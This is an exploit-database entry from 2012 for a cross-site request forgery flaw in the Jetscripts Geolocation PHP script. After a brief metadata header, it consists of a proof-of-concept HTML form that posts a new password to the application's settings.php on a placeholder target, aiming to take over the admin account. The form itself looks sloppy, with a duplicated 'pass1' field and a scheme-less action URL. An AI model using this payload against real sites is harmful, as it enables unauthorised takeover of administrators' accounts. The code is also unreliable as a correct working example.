Jetscripts Geolocation CSRF Vulnerability

2012-03-28T00:00:00
ID 1337DAY-ID-17851
Type zdt
Reporter Jonturk75
Modified 2012-03-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Jetscripts Geolocation CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/jetscripts-geolocation-manager-blocker-/28700/
# Category::  webapps
# Demo : http://jetscripts.com/geotool/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com

<form name="passform" action="target.com/[PATH]/settings.php" method="POST" onsubmit="return checkForm();">
<input name="pass1" id="pass1" size="15" maxlength="20" type="password">
<input name="pass1" id="pass1" size="15" maxlength="20" type="password">
<input name="passbutton" value="Change System Settings" type="submit">
</form>



#  0day.today [2016-04-20]  #